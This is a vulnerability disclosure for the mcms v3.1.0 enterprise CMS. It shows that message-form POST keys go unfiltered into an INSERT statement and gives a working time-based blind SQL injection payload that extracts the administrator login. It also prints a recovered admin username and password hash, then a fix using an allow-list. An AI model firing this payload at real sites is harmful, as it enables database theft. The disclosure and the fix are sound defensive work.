Mcms latest SQL Injection package (any data can be output)
On wooyun we can see that zhangyi technology no longer ignores reported vulnerabilities, so let's join in and look at the latest version of mcms (v_3.1.0.enterprise).
Injection one: POST /app/message/?m=save_message. The POST body is passed through XSS and SQL filtering, but the filtering is incomplete. Let's look at how it can be injected.
Look at the code in /app/message/index.php:
    function m_save_message() {
        global $dbm, $C, $V;
        $_POST = H::sqlxss($_POST);
        $model_fields = array();
        foreach ($_POST as $k => $v) {
            if (substr($k, 0, 9) == 'extern___') { // fill in the extended table field
                $model_fields[substr($k, 9)] = $v;
            }
        }
        // check the extended model table form
        $C->verify_model_form('message', $model_fields);
        $model_fields['create_time'] = time();
        $dbm->single_insert(TB_PRE . 'message', $model_fields, 1);
        die('{"code":0,"msg":"message succeeded"}');
    }
The POST content is filtered; let's see how sqlxss() is implemented.
    public static function sqlxss($input) {
        if (is_array($input)) {
            foreach ($input as $k => $v) {
                $input[$k] = H::sqlxss($v); // only the values are recursed into, never the keys
            }
        } else {
            $input = H::escape($input, 1);
            $input = htmlspecialchars($input, ENT_QUOTES);
        }
        return $input;
    }
H::escape filters the user input and htmlspecialchars encodes it. Let's look at H::escape.
    public static function escape($input, $urldecode = 0) {
        if (is_array($input)) {
            foreach ($input as $k => $v) {
                $input[$k] = H::escape($v, $urldecode);
            }
        } else {
            $input = trim($input);
            if ($urldecode == 1) {
                $input = str_replace(array('+'), array('{addplus}'), $input);
                $input = urldecode($input);
                $input = str_replace(array('{addplus}'), array('+'), $input);
            }
            // if (strnatcasecmp(PHP_VERSION, '5.4.0') >= 0) {
            $input = addslashes($input);
            // } else {
            //     if (!get_magic_quotes_gpc()) { $input = addslashes($input); }
            // }
            // prevent SQL errors caused by a trailing backslash, e.g. 'abc\'
            if (substr($input, -1) == '\\') $input = $input . "'";
            // $input = substr($input, 0, strlen($input) - 1);
        }
        return $input;
    }
The user's input values are fully filtered, but one thing is overlooked: the keys of $_POST are never filtered, and after the extern___ prefix is stripped they are used as column names in the INSERT, which results in injection.
Payload (POST submission):
extern___true_name`)values(''/**/or(select/**/if(ord(mid((select/**/login_name/**/from/**/mcms_user/**/limit/**/0,1),1,1))%3d108,sleep(1),0))or'')#=test&extern___phone=13511111111&extern___content=test
Because this is time-based blind injection, when guessing the first character of the administrator user name a wrong guess delays the response by about 2 seconds, as shown in the figure.
If the guess is correct, the delay is about 3 seconds, as shown in the figure.
Following the steps above (with Burp Intruder or a script of your own), the test administrator's user name is mcmsadmin and the password is f6fdffe48c908deb0f4c3bd36c032e72.
Solution:
Filter the keys of $_POST as well as the values.
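One way to close the hole described above, as an added example that is not mcms's own code: the extended-field names are taken from the POST keys only after a strict identifier check and an allow-list lookup, so a key containing a backtick or parenthesis can never reach the INSERT. The class name SafeFields and the column allow-list are assumptions made for this example.

```php
<?php
// Added example, not mcms code: a hardened replacement for the key
// handling in m_save_message(). Field names derived from $_POST keys
// are validated before they are used as column names.

class SafeFields
{
    // Assumed extended columns of the message table (constructed for the example).
    private static $allowed = array('true_name', 'phone', 'content');

    // Returns only the extended fields whose names are safe identifiers
    // and known columns; every other key is dropped and reported.
    public static function collect(array $post, array &$rejected = array())
    {
        $fields = array();
        foreach ($post as $k => $v) {
            if (substr($k, 0, 9) !== 'extern___') {
                continue; // not an extended-table field at all
            }
            $name = substr($k, 9);
            // Identifier check: letters, digits and underscore only, so a
            // backtick, parenthesis, space or quote in the key is rejected.
            $isIdentifier = preg_match('/^[A-Za-z][A-Za-z0-9_]{0,63}$/', $name) === 1;
            if (!$isIdentifier || !in_array($name, self::$allowed, true)) {
                $rejected[] = $k;
                continue;
            }
            $fields[$name] = $v;
        }
        return $fields;
    }
}

// Constructed sample request: one legitimate key and one hostile key with
// a backtick in the field-name position, the shape the advisory describes.
$post = array(
    'extern___phone'        => '13511111111',
    'extern___true_name`)x' => 'test',
);
$rejected = array();
$fields = SafeFields::collect($post, $rejected);
print_r($fields);   // only the phone field survives
print_r($rejected); // the hostile key is reported instead of reaching SQL
```

The rejected keys are worth logging with the client address, since a backtick or parenthesis in a field name is a reliable sign of probing rather than a typo.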